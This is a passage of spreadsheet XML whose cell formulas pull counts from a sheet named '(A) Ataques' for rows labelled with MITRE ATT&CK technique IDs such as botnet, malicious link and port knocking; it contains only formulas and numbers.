        <f>'(A) Ataques'!ON47+'(A) Ataques'!OT47+'(A) Ataques'!OZ47+'(A) Ataques'!PF47+'(A) Ataques'!PL47</f>
        <v>1</v>
      </c>
      <c r="BL47" s="471">
        <f>'(A) Ataques'!OP47+'(A) Ataques'!OV47+'(A) Ataques'!PB47+'(A) Ataques'!PH47+'(A) Ataques'!PN47</f>
        <v>1</v>
      </c>
      <c r="BM47" s="495">
        <f>'(A) Ataques'!OH47</f>
        <v>1</v>
      </c>
      <c r="BN47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($BJ47=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO47" s="469">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!OC47,"")</f>
        <v>1</v>
      </c>
      <c r="BP47" s="510">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!OD47,"")</f>
        <v>1</v>
      </c>
      <c r="BQ47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!OE47,"")</f>
        <v>1</v>
      </c>
      <c r="BR47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!OF47,"")</f>
        <v>1</v>
      </c>
      <c r="BS47" s="471">
        <f>IF('(A) Ataques'!$AP47&lt;&gt;"NO",'(A) Ataques'!OJ47,"")</f>
        <v>1</v>
      </c>
      <c r="BT47" s="331">
        <f>IF('(A) Ataques'!$AK47&lt;&gt;"NO",IF($BO47=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A48" s="79">
        <f t="shared" si="0"/>
        <v>46</v>
      </c>
      <c r="B48" s="4">
        <f>IF('(A) Ataques'!AK48&lt;&gt;"NO",'(A) Ataques'!E48,"")</f>
        <v>36</v>
      </c>
      <c r="C48" s="6" t="str">
        <f>IF('(A) Ataques'!AK48&lt;&gt;"NO",IF('(A) Ataques'!M48="","",'(A) Ataques'!M48),"")</f>
        <v>T1203-Botnet</v>
      </c>
      <c r="D48" s="4" t="str">
        <f>IF('(A) Ataques'!AK48&lt;&gt;"NO",'(A) Ataques'!F48,"")</f>
        <v>T1203</v>
      </c>
      <c r="E48" s="286">
        <f>IF('(A) Ataques'!AK48&lt;&gt;"NO",'(A) Ataques'!AQ48,"")</f>
        <v>116</v>
      </c>
      <c r="F48" s="288">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!BB48,"")</f>
        <v>1</v>
      </c>
      <c r="G48" s="392">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!BD48,"")</f>
        <v>1</v>
      </c>
      <c r="H48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!BF48,"")</f>
        <v>1</v>
      </c>
      <c r="I48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!BG48,"")</f>
        <v>1</v>
      </c>
      <c r="J48" s="530">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($F48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BH48,"")</f>
        <v>5505</v>
      </c>
      <c r="L48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BJ48,"")</f>
        <v>112</v>
      </c>
      <c r="M48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BL48,"")</f>
        <v>1</v>
      </c>
      <c r="N48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BM48,"")</f>
        <v>112</v>
      </c>
      <c r="O48" s="532">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($K48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P48" s="292">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BN48,"")</f>
        <v>5506</v>
      </c>
      <c r="Q48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BP48,"")</f>
        <v>113</v>
      </c>
      <c r="R48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BR48,"")</f>
        <v>2</v>
      </c>
      <c r="S48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BS48,"")</f>
        <v>112</v>
      </c>
      <c r="T48" s="530">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($P48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BT48,"")</f>
        <v>16570</v>
      </c>
      <c r="V48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BV48,"")</f>
        <v>233</v>
      </c>
      <c r="W48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BX48,"")</f>
        <v>5</v>
      </c>
      <c r="X48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$BY48,"")</f>
        <v>116</v>
      </c>
      <c r="Y48" s="532">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($U48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z48" s="288">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!BZ48,"")</f>
        <v>5528</v>
      </c>
      <c r="AA48" s="392">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!CB48,"")</f>
        <v>135</v>
      </c>
      <c r="AB48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!CD48,"")</f>
        <v>3</v>
      </c>
      <c r="AC48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!CE48,"")</f>
        <v>112</v>
      </c>
      <c r="AD48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF(Z48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CF48,"")</f>
        <v>22098</v>
      </c>
      <c r="AF48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CH48,"")</f>
        <v>368</v>
      </c>
      <c r="AG48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CJ48,"")</f>
        <v>8</v>
      </c>
      <c r="AH48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CK48,"")</f>
        <v>116</v>
      </c>
      <c r="AI48" s="287">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($AE48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ48" s="292">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CL48,"")</f>
        <v>0</v>
      </c>
      <c r="AK48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CN48,"")</f>
        <v>0</v>
      </c>
      <c r="AL48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CP48,"")</f>
        <v>0</v>
      </c>
      <c r="AM48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CQ48,"")</f>
        <v>0</v>
      </c>
      <c r="AN48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($AJ48=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CR48,"")</f>
        <v>0</v>
      </c>
      <c r="AP48" s="322">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CT48,"")</f>
        <v>0</v>
      </c>
      <c r="AQ48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CV48,"")</f>
        <v>0</v>
      </c>
      <c r="AR48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!$CW48,"")</f>
        <v>0</v>
      </c>
      <c r="AS48" s="287">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($AO48=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT48" s="288">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!CX48,"")</f>
        <v>5506</v>
      </c>
      <c r="AU48" s="392">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!CZ48,"")</f>
        <v>113</v>
      </c>
      <c r="AV48" s="4">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!DB48,"")</f>
        <v>2</v>
      </c>
      <c r="AW48" s="20">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",'(A) Ataques'!DC48,"")</f>
        <v>112</v>
      </c>
      <c r="AX48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($AT48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY48" s="469">
        <f>'(A) Ataques'!LU48+'(A) Ataques'!MA48+'(A) Ataques'!MG48+'(A) Ataques'!MM48+'(A) Ataques'!MS48</f>
        <v>224</v>
      </c>
      <c r="AZ48" s="510">
        <f>'(A) Ataques'!LW48+'(A) Ataques'!MC48+'(A) Ataques'!MI48+'(A) Ataques'!MO48+'(A) Ataques'!MU48</f>
        <v>112</v>
      </c>
      <c r="BA48" s="471">
        <f>'(A) Ataques'!LY48+'(A) Ataques'!ME48+'(A) Ataques'!MK48+'(A) Ataques'!MQ48+'(A) Ataques'!MW48</f>
        <v>1</v>
      </c>
      <c r="BB48" s="471">
        <f>'(A) Ataques'!LQ48</f>
        <v>112</v>
      </c>
      <c r="BC48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($AY48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD48" s="469">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!LL48,"")</f>
        <v>454</v>
      </c>
      <c r="BE48" s="510">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!LM48,"")</f>
        <v>342</v>
      </c>
      <c r="BF48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!LN48,"")</f>
        <v>1</v>
      </c>
      <c r="BG48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!LO48,"")</f>
        <v>2</v>
      </c>
      <c r="BH48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!LS48,"")</f>
        <v>115</v>
      </c>
      <c r="BI48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($BD48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ48" s="469">
        <f>'(A) Ataques'!OL48+'(A) Ataques'!OR48+'(A) Ataques'!OX48+'(A) Ataques'!PD48+'(A) Ataques'!PJ48</f>
        <v>213</v>
      </c>
      <c r="BK48" s="510">
        <f>'(A) Ataques'!ON48+'(A) Ataques'!OT48+'(A) Ataques'!OZ48+'(A) Ataques'!PF48+'(A) Ataques'!PL48</f>
        <v>205</v>
      </c>
      <c r="BL48" s="471">
        <f>'(A) Ataques'!OP48+'(A) Ataques'!OV48+'(A) Ataques'!PB48+'(A) Ataques'!PH48+'(A) Ataques'!PN48</f>
        <v>4</v>
      </c>
      <c r="BM48" s="495">
        <f>'(A) Ataques'!OH48</f>
        <v>112</v>
      </c>
      <c r="BN48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($BJ48=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO48" s="469">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!OC48,"")</f>
        <v>213</v>
      </c>
      <c r="BP48" s="510">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!OD48,"")</f>
        <v>205</v>
      </c>
      <c r="BQ48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!OE48,"")</f>
        <v>4</v>
      </c>
      <c r="BR48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!OF48,"")</f>
        <v>1</v>
      </c>
      <c r="BS48" s="471">
        <f>IF('(A) Ataques'!$AP48&lt;&gt;"NO",'(A) Ataques'!OJ48,"")</f>
        <v>112</v>
      </c>
      <c r="BT48" s="331">
        <f>IF('(A) Ataques'!$AK48&lt;&gt;"NO",IF($BO48=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A49" s="79">
        <f t="shared" si="0"/>
        <v>47</v>
      </c>
      <c r="B49" s="4">
        <f>IF('(A) Ataques'!AK49&lt;&gt;"NO",'(A) Ataques'!E49,"")</f>
        <v>37</v>
      </c>
      <c r="C49" s="6" t="str">
        <f>IF('(A) Ataques'!AK49&lt;&gt;"NO",IF('(A) Ataques'!M49="","",'(A) Ataques'!M49),"")</f>
        <v>T1204.001-malicious_link</v>
      </c>
      <c r="D49" s="4" t="str">
        <f>IF('(A) Ataques'!AK49&lt;&gt;"NO",'(A) Ataques'!F49,"")</f>
        <v>T1204</v>
      </c>
      <c r="E49" s="286">
        <f>IF('(A) Ataques'!AK49&lt;&gt;"NO",'(A) Ataques'!AQ49,"")</f>
        <v>1</v>
      </c>
      <c r="F49" s="288">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!BB49,"")</f>
        <v>0</v>
      </c>
      <c r="G49" s="392">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!BD49,"")</f>
        <v>0</v>
      </c>
      <c r="H49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!BF49,"")</f>
        <v>0</v>
      </c>
      <c r="I49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!BG49,"")</f>
        <v>0</v>
      </c>
      <c r="J49" s="530">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($F49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BH49,"")</f>
        <v>0</v>
      </c>
      <c r="L49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BJ49,"")</f>
        <v>0</v>
      </c>
      <c r="M49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BL49,"")</f>
        <v>0</v>
      </c>
      <c r="N49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BM49,"")</f>
        <v>0</v>
      </c>
      <c r="O49" s="532">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($K49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P49" s="292">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BN49,"")</f>
        <v>0</v>
      </c>
      <c r="Q49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BP49,"")</f>
        <v>0</v>
      </c>
      <c r="R49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BR49,"")</f>
        <v>0</v>
      </c>
      <c r="S49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BS49,"")</f>
        <v>0</v>
      </c>
      <c r="T49" s="530">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($P49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BT49,"")</f>
        <v>0</v>
      </c>
      <c r="V49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BV49,"")</f>
        <v>0</v>
      </c>
      <c r="W49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BX49,"")</f>
        <v>0</v>
      </c>
      <c r="X49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$BY49,"")</f>
        <v>0</v>
      </c>
      <c r="Y49" s="532">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($U49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z49" s="288">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!BZ49,"")</f>
        <v>4</v>
      </c>
      <c r="AA49" s="392">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!CB49,"")</f>
        <v>2</v>
      </c>
      <c r="AB49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!CD49,"")</f>
        <v>2</v>
      </c>
      <c r="AC49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!CE49,"")</f>
        <v>1</v>
      </c>
      <c r="AD49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF(Z49=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CF49,"")</f>
        <v>4</v>
      </c>
      <c r="AF49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CH49,"")</f>
        <v>2</v>
      </c>
      <c r="AG49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CJ49,"")</f>
        <v>2</v>
      </c>
      <c r="AH49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CK49,"")</f>
        <v>1</v>
      </c>
      <c r="AI49" s="287">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($AE49=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ49" s="292">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CL49,"")</f>
        <v>0</v>
      </c>
      <c r="AK49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CN49,"")</f>
        <v>0</v>
      </c>
      <c r="AL49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CP49,"")</f>
        <v>0</v>
      </c>
      <c r="AM49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CQ49,"")</f>
        <v>0</v>
      </c>
      <c r="AN49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($AJ49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CR49,"")</f>
        <v>0</v>
      </c>
      <c r="AP49" s="322">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CT49,"")</f>
        <v>0</v>
      </c>
      <c r="AQ49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CV49,"")</f>
        <v>0</v>
      </c>
      <c r="AR49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!$CW49,"")</f>
        <v>0</v>
      </c>
      <c r="AS49" s="287">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($AO49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT49" s="288">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!CX49,"")</f>
        <v>0</v>
      </c>
      <c r="AU49" s="392">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!CZ49,"")</f>
        <v>0</v>
      </c>
      <c r="AV49" s="4">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!DB49,"")</f>
        <v>0</v>
      </c>
      <c r="AW49" s="20">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",'(A) Ataques'!DC49,"")</f>
        <v>0</v>
      </c>
      <c r="AX49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($AT49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY49" s="469">
        <f>'(A) Ataques'!LU49+'(A) Ataques'!MA49+'(A) Ataques'!MG49+'(A) Ataques'!MM49+'(A) Ataques'!MS49</f>
        <v>0</v>
      </c>
      <c r="AZ49" s="510">
        <f>'(A) Ataques'!LW49+'(A) Ataques'!MC49+'(A) Ataques'!MI49+'(A) Ataques'!MO49+'(A) Ataques'!MU49</f>
        <v>0</v>
      </c>
      <c r="BA49" s="471">
        <f>'(A) Ataques'!LY49+'(A) Ataques'!ME49+'(A) Ataques'!MK49+'(A) Ataques'!MQ49+'(A) Ataques'!MW49</f>
        <v>0</v>
      </c>
      <c r="BB49" s="471">
        <f>'(A) Ataques'!LQ49</f>
        <v>0</v>
      </c>
      <c r="BC49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($AY49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD49" s="469">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!LL49,"")</f>
        <v>0</v>
      </c>
      <c r="BE49" s="510">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!LM49,"")</f>
        <v>0</v>
      </c>
      <c r="BF49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!LN49,"")</f>
        <v>0</v>
      </c>
      <c r="BG49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!LO49,"")</f>
        <v>0</v>
      </c>
      <c r="BH49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!LS49,"")</f>
        <v>0</v>
      </c>
      <c r="BI49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($BD49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BJ49" s="469">
        <f>'(A) Ataques'!OL49+'(A) Ataques'!OR49+'(A) Ataques'!OX49+'(A) Ataques'!PD49+'(A) Ataques'!PJ49</f>
        <v>0</v>
      </c>
      <c r="BK49" s="510">
        <f>'(A) Ataques'!ON49+'(A) Ataques'!OT49+'(A) Ataques'!OZ49+'(A) Ataques'!PF49+'(A) Ataques'!PL49</f>
        <v>0</v>
      </c>
      <c r="BL49" s="471">
        <f>'(A) Ataques'!OP49+'(A) Ataques'!OV49+'(A) Ataques'!PB49+'(A) Ataques'!PH49+'(A) Ataques'!PN49</f>
        <v>0</v>
      </c>
      <c r="BM49" s="495">
        <f>'(A) Ataques'!OH49</f>
        <v>0</v>
      </c>
      <c r="BN49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($BJ49=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO49" s="469">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!OC49,"")</f>
        <v>0</v>
      </c>
      <c r="BP49" s="510">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!OD49,"")</f>
        <v>0</v>
      </c>
      <c r="BQ49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!OE49,"")</f>
        <v>0</v>
      </c>
      <c r="BR49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!OF49,"")</f>
        <v>0</v>
      </c>
      <c r="BS49" s="471">
        <f>IF('(A) Ataques'!$AP49&lt;&gt;"NO",'(A) Ataques'!OJ49,"")</f>
        <v>0</v>
      </c>
      <c r="BT49" s="331">
        <f>IF('(A) Ataques'!$AK49&lt;&gt;"NO",IF($BO49=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A50" s="79">
        <f t="shared" si="0"/>
        <v>48</v>
      </c>
      <c r="B50" s="4">
        <f>IF('(A) Ataques'!AK50&lt;&gt;"NO",'(A) Ataques'!E50,"")</f>
        <v>38</v>
      </c>
      <c r="C50" s="6" t="str">
        <f>IF('(A) Ataques'!AK50&lt;&gt;"NO",IF('(A) Ataques'!M50="","",'(A) Ataques'!M50),"")</f>
        <v>T1205.001-Port_Knocking</v>
      </c>
      <c r="D50" s="4" t="str">
        <f>IF('(A) Ataques'!AK50&lt;&gt;"NO",'(A) Ataques'!F50,"")</f>
        <v>T1205</v>
      </c>
      <c r="E50" s="286">
        <f>IF('(A) Ataques'!AK50&lt;&gt;"NO",'(A) Ataques'!AQ50,"")</f>
        <v>5</v>
      </c>
      <c r="F50" s="288">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!BB50,"")</f>
        <v>2</v>
      </c>
      <c r="G50" s="392">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!BD50,"")</f>
        <v>1</v>
      </c>
      <c r="H50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!BF50,"")</f>
        <v>1</v>
      </c>
      <c r="I50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!BG50,"")</f>
        <v>1</v>
      </c>
      <c r="J50" s="530">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($F50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BH50,"")</f>
        <v>0</v>
      </c>
      <c r="L50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BJ50,"")</f>
        <v>0</v>
      </c>
      <c r="M50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BL50,"")</f>
        <v>0</v>
      </c>
      <c r="N50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BM50,"")</f>
        <v>0</v>
      </c>
      <c r="O50" s="532">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($K50=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P50" s="292">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BN50,"")</f>
        <v>2</v>
      </c>
      <c r="Q50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BP50,"")</f>
        <v>1</v>
      </c>
      <c r="R50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BR50,"")</f>
        <v>1</v>
      </c>
      <c r="S50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BS50,"")</f>
        <v>1</v>
      </c>
      <c r="T50" s="530">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($P50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BT50,"")</f>
        <v>3</v>
      </c>
      <c r="V50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BV50,"")</f>
        <v>2</v>
      </c>
      <c r="W50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BX50,"")</f>
        <v>2</v>
      </c>
      <c r="X50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$BY50,"")</f>
        <v>1</v>
      </c>
      <c r="Y50" s="532">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($U50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z50" s="288">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!BZ50,"")</f>
        <v>4</v>
      </c>
      <c r="AA50" s="392">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!CB50,"")</f>
        <v>4</v>
      </c>
      <c r="AB50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!CD50,"")</f>
        <v>2</v>
      </c>
      <c r="AC50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!CE50,"")</f>
        <v>2</v>
      </c>
      <c r="AD50" s="331">
